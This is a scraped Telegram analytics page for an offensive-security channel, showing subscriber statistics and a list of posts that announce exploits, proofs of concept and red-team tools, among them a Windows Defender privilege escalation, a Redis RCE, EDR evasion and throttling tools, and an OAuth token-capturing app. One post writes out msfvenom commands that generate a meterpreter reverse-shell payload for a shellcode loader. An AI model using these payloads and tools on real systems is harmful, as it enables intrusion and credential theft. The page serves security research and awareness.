Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
reconcore
Kanalga Telegram’da o‘tish
#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.
Ko'proq ko'rsatish2 161
Obunachilar
+624 soatlar
+147 kunlar
+6130 kunlar
Ma'lumot yuklanmoqda...
O'xshash kanallar
Taglar buluti
Kirish va chiqish esdaliklari
---
---
---
---
---
---
Obunachilarni jalb qilish
Iyun '26
Iyun '26
+36
0 kanalda
May '26
+92
1 kanalda
Get PRO
Aprel '26
+89
2 kanalda
Get PRO
Mart '26
+116
1 kanalda
Get PRO
Fevral '26
+145
1 kanalda
Get PRO
Yanvar '26
+157
2 kanalda
Get PRO
Dekabr '25
+317
3 kanalda
Get PRO
Noyabr '25
+170
0 kanalda
Get PRO
Oktabr '25
+216
1 kanalda
Get PRO
Sentabr '25
+125
2 kanalda
Get PRO
Avgust '25
+118
5 kanalda
Get PRO
Iyul '25
+96
2 kanalda
Get PRO
Iyun '25
+51
1 kanalda
Get PRO
May '25
+68
3 kanalda
Get PRO
Aprel '25
+117
2 kanalda
Get PRO
Mart '25
+84
1 kanalda
Get PRO
Fevral '25
+108
1 kanalda
Get PRO
Yanvar '25
+73
2 kanalda
Get PRO
Dekabr '24
+4
0 kanalda
Get PRO
Noyabr '24
+127
0 kanalda
Get PRO
Oktabr '24
+38
0 kanalda
Get PRO
Sentabr '24
+37
0 kanalda
Get PRO
Avgust '24
+328
0 kanalda
Get PRO
Iyul '240
0 kanalda
Get PRO
Iyun '24
+15
1 kanalda
| Sana | Obunachilarni jalb qilish | Esdaliklar | Kanallar | |
| 14 Iyun | +1 | |||
| 13 Iyun | +6 | |||
| 12 Iyun | +1 | |||
| 11 Iyun | +3 | |||
| 10 Iyun | +3 | |||
| 09 Iyun | +3 | |||
| 08 Iyun | +1 | |||
| 07 Iyun | +4 | |||
| 06 Iyun | +1 | |||
| 05 Iyun | +1 | |||
| 04 Iyun | +4 | |||
| 03 Iyun | 0 | |||
| 02 Iyun | +6 | |||
| 01 Iyun | +2 |
Kanal postlari
группа доступна по одобрению администратора
запрещается:
рассылать рассылка реклам/ распространять исполняемые файлы.administration
| 2 | группа доступна по одобрению администратора
запрещается:
рассылать рассылка реклам/
распространять исполняемые файлы. | 3 |
| 3 | Ivanti Sentry Pre-Auth RCE
Ivanti Sentry authentication bypass and remote code execution vulnerabilities CVE-2026-10520, CVE-2026-10523.
Blog: https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/ | 86 |
| 4 | https://t.me/+PQ3ekq7avh80M2Iy | 291 |
| 5 |  Matn yo'q... | 216 |
| 6 |  RoguePlanet
Windows Defender LPE. The exploit is a race condition, so it's a hit or miss. I have managed to get a 100% success rate on some machines while it struggled to work on others. The exploit has been tested in Windows 11 (Official channel + Canary) and Windows 10 with june 2026 patch installed. The PoC however does not work in Windows Server since standard users cannot mount an ISO image, I'm confident that all Windows Server versions are vulnerable as well, you just need to redesign the exploit.
#vulnerability #race_condition #lpe #poc @reconcore | 556 |
| 7 | BOF Cocktails in Cobalt Strike: Instrumenting BOFs with BEACON_INLINE_EXECUTE and Crystal Palace
Original text: “BOF Cocktails in Cobalt Strike” — Rasta Mouse, rastamouse.me (05 Jun 2026). Code blocks and the screenshot below are reproduced verbatim from the source with attribution.
Post-exploitation Beacon Object Files (BOFs) historically inherited their evasion posture from whatever agent or loader executed them. If the loader took care of unhooking, masking,…
#redteam #bof @reconcore | 521 |
| 8 |  QuadRF lets you directly explore the RF environment around you. See where signals are, the way they propagate, and how antennas and the surrounding environment interact. At 30 fps, you can map WiFi devices in a room, quadcopters in the sky, or other wireless transmitters. Expanding beyond vision and LiDAR, your robots can use QuadRF to gain real-time spatial awareness of surrounding radio beacons and access points.
#rf #sdr @reconcore | 477 |
| 9 | DLL Hijacking Vulnerability Scanner
SearchAvailableExe is a comprehensive security research tool designed to identify and analyze DLL hijacking vulnerabilities in Windows executable files. This tool systematically scans signed executables to find potential DLL hijacking opportunities, making it valuable for security researchers, penetration testers, and system administrators.
#pe #re #dll #injection #analysis #binary #vulnerability #scanner #hijacking #security #research @reconcore | 403 |
| 10 |  FirewallXPL-Forge
Perimeter security exploitation framework — 164 modules covering FW, NGFW, UTM, WAF, VPN, NAC, LB, and OT/ICS firewalls (Fortinet, Cisco, Palo Alto, F5, Citrix, Check Point, SonicWall, Ivanti, Siemens, Moxa, +13 vendors). GPU-accelerated, ML-driven, async concurrency, Rich TUI.
#python #firewall #penetration_testing #pentest #ngfw #exploitation #framework #redteam #ics #security #vulnerability #scanner #waf #bypass #vpn #exploit #ot @reconcore | 397 |
| 11 | Shellcode-EDR-Evasion-Loader
shellcode loader with XOR encryption and EDR evasion techniques. for security research and authorized testing only.
payload:
msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin
reverse shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin
#shellcode #loader #windows #security #edr #evasion @reconcore | 431 |
| 12 |  c2detect
C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel
cognis.digital #python #cli #automation #infosec #pentest #offensivesecurity #redteam @reconcore | 492 |
| 13 | EDRChoker
Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated from their server they lose much of their capability, and administrators can no longer collect or monitor logs from those agents. EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect they will consistently time out due to the extremely low bandwidth.
Blog: https://www.zerosalarium.com/2026/06/edrchoker-choking-telemetry-stream-block-edr.html
In this article I present a technique for interfering with the client–server connection of an EDR. It’s different from EDR connection-blocking methods that use the Windows Firewall or the Windows Filtering Platform (WFP). | 529 |
| 14 | CVE-2026-0826: Unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones (RCE as root)
Vulnerable: VVX 150, VVX 250, VVX 350, and VVX 450), as well as Trio IP Conference series (Trio 8800, Trio 8500, and Trio 8300).
Blog: https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/ | 474 |
| 15 | Hidden HTTP/2 Bomb
*
FOR nginx, Apache httpd, Microsoft IIS, Envoy, Cloudflare Pingora
*
WriteUP + LABs + PoCs | 610 |
| 16 | DarkReplica (CVE-2026-23631)
Redis Post-Auth RCE Exploit
The full technical writeup can be found here: https://www.zeroday.cloud/blog/redis-cve-2026-23631-dark-replica
#cve #redis #technique #rce @reconcore | 602 |
| 17 | One Click, One Hash: Unpatched NTLM Coercion in Windows Search URI Handler
Original text by Andrew Schwartz
Key Takeaways
Same bug class. No CVE. No fix. The NTLM coercion primitive in the Windows search: URI handler is technically identical to CVE-2026-33829 in the Snipping Tool. Same severity rating, same mechanism, same potential impact. Microsoft closed it without a CVE or a patch, describing its triage process as…
https://core-jmp.org/2026/06/one-click-one-hash-unpatched-ntlm-coercion-in-windows-search-uri-handler/ | 624 |
| 18 | ssh-keysign-pwn — CVE-2026-46333
A critical race condition flaw in pre-31e62c2ebbfd Linux kernels. Due to a window during process exit where the memory management structure is cleared before file descriptors are closed, an unprivileged user can use pidfd_getfd(2) to steal open file descriptors of privileged processes, enabling unauthorized reading of root-owned files.
🔗 Exploit:
https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
🔗 Source:
https://blog.qualys.com/vulnerabilities-threat-research/2026/05/20/cve-2026-46333-local-root-privilege-escalation-and-credential-disclosure-in-the-linux-kernel-ptrace-path
#linux #kernel #privesc #racecondition #pidfd | 624 |
| 19 | CVE-2026-41089
Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow
CVSS 9.8 CRITICAL
#vulnerability #rce #cldap #poc @reconcore | 610 |
| 20 | MalGitApp
A simple OAuth App designed to capture OAuth tokens when users authenticate through GitHub OAuth flow.
The Phishy GitHub Issue Case
Developers have become a primary target for threat actors. The reason is simple and can be easily understood : they are the backbone of software you are using. They are the one publishing code that will execute on your machine when developing, in your CI/CD pipelines and on the servers in production. This type of attack is called “Supply Chain Attack”, where the attackers target the suppliers in order to compromise organizations or individuals. Basically, they compromise the third-parties to reach their main target (or hit at scale). Some of the recent examples of such attacks are involving Axios and LiteLLM with their 100M downloads per week each.
#phishing #oauth @reconcore | 668 |
